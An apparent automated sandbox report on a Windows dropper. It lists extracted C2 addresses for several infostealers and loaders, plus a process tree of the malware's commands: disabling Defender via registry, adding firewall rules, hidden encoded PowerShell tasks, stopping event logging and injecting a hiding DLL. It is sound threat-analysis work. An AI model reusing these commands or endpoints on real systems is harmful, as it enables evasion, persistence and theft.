Resubmissions

09-04-2024 13:39

240409-qx1czsbf71 7

09-04-2024 13:39

240409-qxzfpagd52 7

09-04-2024 13:39

240409-qxyt6abf7z 7

09-04-2024 13:39

240409-qxx8magd46 7

03-04-2024 19:01

240403-xpdbtaac35 10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-04-2024 19:01

General

  • Target

    6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe

  • Size

    4.5MB

  • MD5

    20ed8b8eb556fa3cbc88b83882a6f1b0

  • SHA1

    cd7ce6fc0068b6ef9c37d5dafec1319a39b88709

  • SHA256

    6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421

  • SHA512

    868b859bdff27e41f63b527590214ad22dcaf332bb3d5c7daafd295ea648d71d5bd6d01fee29587eee8b7d4ef01384089eb0b2408f3d2e048021701c357e3b9b

  • SSDEEP

    98304:in1GhDYSAEbWAtdt7Eea0+JJHOBMT6yCltq5CFvxWof8e45D4UO38cYd5:0gYfux7EF0CHqI6Xg5CFvxW2Pe

Malware Config

Extracted

Family

smokeloader

Botnet

pub3

Extracted

Family

stealc

C2

http://185.172.128.26

Attributes
  • url_path

    /f993692117a3fda2.php

Extracted

Family

vidar

C2

https://steamcommunity.com/profiles/76561199658817715

https://t.me/sa9ok

https://steamcommunity.com/profiles/76561199662282318

https://t.me/t8jmhl

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

C2

5.42.65.0:29587

Extracted

Family

smokeloader

Version

2022

C2

http://nidoe.org/tmp/index.php

http://sodez.ru/tmp/index.php

http://uama.com.ua/tmp/index.php

http://talesofpirates.net/tmp/index.php

rc4.i32
rc4.i32

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect Vidar Stealer 5 IoCs
  • Detect ZGRat V1 4 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Stealc

    Stealc is an infostealer written in C++.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 42 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 10 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 17 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
    "C:\Users\Admin\AppData\Local\Temp\6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe"
    1⤵
    • Checks computer location settings
    • Drops file in System32 directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2796
    • C:\Users\Admin\Documents\GuardFox\QaDS18iYQkgVOw5MGDctxUWY.exe
      "C:\Users\Admin\Documents\GuardFox\QaDS18iYQkgVOw5MGDctxUWY.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:2036
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
          PID:4460
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4460 -s 2096
            4⤵
            • Program crash
            PID:3424
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 792
          3⤵
          • Program crash
          PID:4616
      • C:\Users\Admin\Documents\GuardFox\vW4Nbn3LNaPo1GRZeUVmW5rG.exe
        "C:\Users\Admin\Documents\GuardFox\vW4Nbn3LNaPo1GRZeUVmW5rG.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:2668
      • C:\Users\Admin\Documents\GuardFox\5tNzlR9NhYdEFhuQB2NB_AGP.exe
        "C:\Users\Admin\Documents\GuardFox\5tNzlR9NhYdEFhuQB2NB_AGP.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2888
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2076
        • C:\Users\Admin\Documents\GuardFox\5tNzlR9NhYdEFhuQB2NB_AGP.exe
          "C:\Users\Admin\Documents\GuardFox\5tNzlR9NhYdEFhuQB2NB_AGP.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Drops file in Windows directory
          PID:1884
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:2120
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            4⤵
              PID:3000
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                5⤵
                • Modifies Windows Firewall
                PID:2276
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              4⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:440
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              4⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:2580
        • C:\Users\Admin\Documents\GuardFox\bfnZhb9C4kEsGiqq6uh2DkGw.exe
          "C:\Users\Admin\Documents\GuardFox\bfnZhb9C4kEsGiqq6uh2DkGw.exe"
          2⤵
          • Executes dropped EXE
          PID:4484
        • C:\Users\Admin\Documents\GuardFox\T0Low6kfxfOVSTCz1xKuW3FF.exe
          "C:\Users\Admin\Documents\GuardFox\T0Low6kfxfOVSTCz1xKuW3FF.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:2660
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2264
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2504
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2184
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3192
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe delete "OBGPQMHF"
            3⤵
            • Launches sc.exe
            PID:4436
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
            3⤵
            • Launches sc.exe
            PID:4540
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop eventlog
            3⤵
            • Launches sc.exe
            PID:3692
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe start "OBGPQMHF"
            3⤵
            • Launches sc.exe
            PID:636
        • C:\Users\Admin\Documents\GuardFox\A8mFXN9X10tndnylrvwhkeAG.exe
          "C:\Users\Admin\Documents\GuardFox\A8mFXN9X10tndnylrvwhkeAG.exe"
          2⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          PID:2028
        • C:\Users\Admin\Documents\GuardFox\6AZO5Het33oIWLnZ2TsVqcYJ.exe
          "C:\Users\Admin\Documents\GuardFox\6AZO5Het33oIWLnZ2TsVqcYJ.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:5048
          • C:\Users\Admin\AppData\Local\Temp\is-6QR0E.tmp\6AZO5Het33oIWLnZ2TsVqcYJ.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-6QR0E.tmp\6AZO5Het33oIWLnZ2TsVqcYJ.tmp" /SL5="$10003E,1678831,54272,C:\Users\Admin\Documents\GuardFox\6AZO5Het33oIWLnZ2TsVqcYJ.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:4084
            • C:\Users\Admin\AppData\Local\Screenshot Generator\shgenerator.exe
              "C:\Users\Admin\AppData\Local\Screenshot Generator\shgenerator.exe" -i
              4⤵
              • Executes dropped EXE
              PID:4384
            • C:\Users\Admin\AppData\Local\Screenshot Generator\shgenerator.exe
              "C:\Users\Admin\AppData\Local\Screenshot Generator\shgenerator.exe" -s
              4⤵
              • Executes dropped EXE
              PID:3340
        • C:\Users\Admin\Documents\GuardFox\Ae5Ds0abnrSUcQoZSmERk4De.exe
          "C:\Users\Admin\Documents\GuardFox\Ae5Ds0abnrSUcQoZSmERk4De.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:4164
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GHDHJEBFBF.exe"
            3⤵
              PID:2184
              • C:\Users\Admin\AppData\Local\Temp\GHDHJEBFBF.exe
                "C:\Users\Admin\AppData\Local\Temp\GHDHJEBFBF.exe"
                4⤵
                • Checks computer location settings
                • Executes dropped EXE
                PID:1456
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\GHDHJEBFBF.exe
                  5⤵
                    PID:1616
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 2.2.2.2 -n 1 -w 3000
                      6⤵
                      • Runs ping.exe
                      PID:4040
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 2408
                3⤵
                • Program crash
                PID:1924
            • C:\Users\Admin\Documents\GuardFox\fI0Z7Px_wurPZCnUR9jY5Gfn.exe
              "C:\Users\Admin\Documents\GuardFox\fI0Z7Px_wurPZCnUR9jY5Gfn.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:3188
            • C:\Users\Admin\Documents\GuardFox\XR9aCbvSeH0PNmiOfR0DyV7v.exe
              "C:\Users\Admin\Documents\GuardFox\XR9aCbvSeH0PNmiOfR0DyV7v.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1244
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4888
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 2468
                  4⤵
                  • Program crash
                  PID:1740
              • C:\Users\Admin\Documents\GuardFox\XR9aCbvSeH0PNmiOfR0DyV7v.exe
                "C:\Users\Admin\Documents\GuardFox\XR9aCbvSeH0PNmiOfR0DyV7v.exe"
                3⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Checks for VirtualBox DLLs, possible anti-VM trick
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                PID:4092
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  4⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:448
                • C:\Windows\system32\cmd.exe
                  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                  4⤵
                    PID:3796
                    • C:\Windows\system32\netsh.exe
                      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                      5⤵
                      • Modifies Windows Firewall
                      PID:388
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    4⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2580
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    4⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:228
                  • C:\Windows\rss\csrss.exe
                    C:\Windows\rss\csrss.exe
                    4⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Manipulates WinMonFS driver.
                    • Drops file in Windows directory
                    PID:456
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      5⤵
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:3152
                    • C:\Windows\SYSTEM32\schtasks.exe
                      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                      5⤵
                      • Creates scheduled task(s)
                      PID:3080
                    • C:\Windows\SYSTEM32\schtasks.exe
                      schtasks /delete /tn ScheduledUpdate /f
                      5⤵
                        PID:4980
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        5⤵
                        • Drops file in System32 directory
                        PID:688
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        5⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        PID:716
                      • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                        5⤵
                        • Executes dropped EXE
                        PID:2096
                      • C:\Windows\SYSTEM32\schtasks.exe
                        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                        5⤵
                        • Creates scheduled task(s)
                        PID:3672
                      • C:\Windows\windefender.exe
                        "C:\Windows\windefender.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:4752
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                          6⤵
                            PID:4888
                            • C:\Windows\SysWOW64\sc.exe
                              sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                              7⤵
                              • Launches sc.exe
                              PID:3100
                  • C:\Users\Admin\Documents\GuardFox\jsinW_BETWxrFBeb1xXIjCeh.exe
                    "C:\Users\Admin\Documents\GuardFox\jsinW_BETWxrFBeb1xXIjCeh.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:868
                    • C:\Users\Admin\AppData\Local\Temp\7zSB40E.tmp\Install.exe
                      .\Install.exe /CLupdidemf "525403" /S
                      3⤵
                      • Checks BIOS information in registry
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      • Enumerates system info in registry
                      PID:4904
                      • C:\Windows\SysWOW64\forfiles.exe
                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                        4⤵
                          PID:1200
                          • C:\Windows\SysWOW64\cmd.exe
                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                            5⤵
                              PID:4192
                              • \??\c:\windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                6⤵
                                  PID:4400
                                • \??\c:\windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                  6⤵
                                    PID:4412
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                4⤵
                                  PID:4552
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                    5⤵
                                      PID:1380
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                        6⤵
                                          PID:3484
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                          6⤵
                                            PID:1648
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "gmdisvdmh" /SC once /ST 09:20:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                        4⤵
                                        • Creates scheduled task(s)
                                        PID:448
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /run /I /tn "gmdisvdmh"
                                        4⤵
                                          PID:3428
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /DELETE /F /TN "gmdisvdmh"
                                          4⤵
                                            PID:2244
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /CREATE /TN "btbwILgIDOMomJfKYB" /SC once /ST 19:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\XqppFsW.exe\" RD /nMsite_idkjt 525403 /S" /V1 /F
                                            4⤵
                                            • Drops file in Windows directory
                                            • Creates scheduled task(s)
                                            PID:4264
                                      • C:\Users\Admin\Documents\GuardFox\WYPUIGgN6vuEmknhIqzgRSQb.exe
                                        "C:\Users\Admin\Documents\GuardFox\WYPUIGgN6vuEmknhIqzgRSQb.exe"
                                        2⤵
                                        • Checks computer location settings
                                        • Drops startup file
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:884
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
                                          3⤵
                                          • Creates scheduled task(s)
                                          PID:368
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
                                          3⤵
                                          • Creates scheduled task(s)
                                          PID:3616
                                        • C:\Users\Admin\Documents\GuardFox\WYPUIGgN6vuEmknhIqzgRSQb.exe
                                          "C:\Users\Admin\Documents\GuardFox\WYPUIGgN6vuEmknhIqzgRSQb.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:4916
                                      • C:\Users\Admin\Documents\GuardFox\smTf9RkOSDoC4v5y22bl3fvg.exe
                                        "C:\Users\Admin\Documents\GuardFox\smTf9RkOSDoC4v5y22bl3fvg.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of SetThreadContext
                                        PID:4304
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                          3⤵
                                            PID:3136
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              4⤵
                                                PID:3484
                                          • C:\Users\Admin\Documents\GuardFox\l8l9RRY3_DDsTnswn30f44qI.exe
                                            "C:\Users\Admin\Documents\GuardFox\l8l9RRY3_DDsTnswn30f44qI.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:1864
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              3⤵
                                                PID:4964
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 2084
                                                  4⤵
                                                  • Program crash
                                                  PID:4540
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 792
                                                3⤵
                                                • Program crash
                                                PID:4688
                                            • C:\Users\Admin\Documents\GuardFox\7_yhNfarqM1lgLovwKi2qclO.exe
                                              "C:\Users\Admin\Documents\GuardFox\7_yhNfarqM1lgLovwKi2qclO.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4196
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                3⤵
                                                  PID:5000
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                  3⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3352
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 792
                                                  3⤵
                                                  • Program crash
                                                  PID:4752
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                              1⤵
                                                PID:1956
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                1⤵
                                                  PID:3372
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2036 -ip 2036
                                                  1⤵
                                                    PID:612
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1864 -ip 1864
                                                    1⤵
                                                      PID:4384
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4196 -ip 4196
                                                      1⤵
                                                        PID:1292
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4460 -ip 4460
                                                        1⤵
                                                          PID:5000
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:748
                                                          • C:\Windows\system32\gpupdate.exe
                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                            2⤵
                                                              PID:5000
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                3⤵
                                                                  PID:2076
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4888 -ip 4888
                                                              1⤵
                                                                PID:3692
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4964 -ip 4964
                                                                1⤵
                                                                  PID:4480
                                                                • C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
                                                                  C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:4068
                                                                  • C:\Windows\system32\powercfg.exe
                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                    2⤵
                                                                      PID:1556
                                                                    • C:\Windows\system32\powercfg.exe
